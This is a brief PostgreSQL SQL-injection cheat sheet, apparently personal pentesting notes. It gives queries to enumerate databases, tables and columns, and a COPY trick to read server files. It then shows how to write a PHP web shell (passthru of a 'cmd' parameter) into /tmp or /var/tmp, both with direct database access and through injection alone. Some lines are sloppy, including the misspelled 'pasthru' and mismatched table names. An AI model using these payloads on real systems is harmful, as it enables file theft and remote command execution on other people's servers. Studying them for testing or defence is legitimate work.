To list version: SELECT version()

Concatenating (concatenate put 2 together: concat(name1,':',name2)

To comment, use xx--

Show all databases: select schema_name from information_schema.schemata;

Show the table name: select concat(schemaname,':',tablename) FROM pg_catalog.pg_tables WHERE schemaname != 'pg_catalog' AND schemaname != 'information_schema';

Show the column name if table name is mytable: SELECT column_name FROM information_schema.columns where table_name = 'users';

Finally select object use select columnname from database.table;

If you have direct DB access (via psql, usually through account postgres), can use the following:
\list to list database
\c database name to use the database
\d to list the tables

To read file when you have direct DB access, use the following:

CREATE TABLE demo(t text);
COPY demo from '[FILENAME]';
SELECT * FROM demo;

To write file when you have direct DB access, use

CREATE TABLE mytable (mycol text);
INSERT INTO mytable(mycol) VALUES ('<? pasthru($_GET[cmd]); ?>');
COPY mytable (mycol) TO '/tmp/test.php';

To write file when you only have injection, use

copy(select '<?php passthru($_GET[''cmd'']);?>') to '/var/tmp/cmd.php';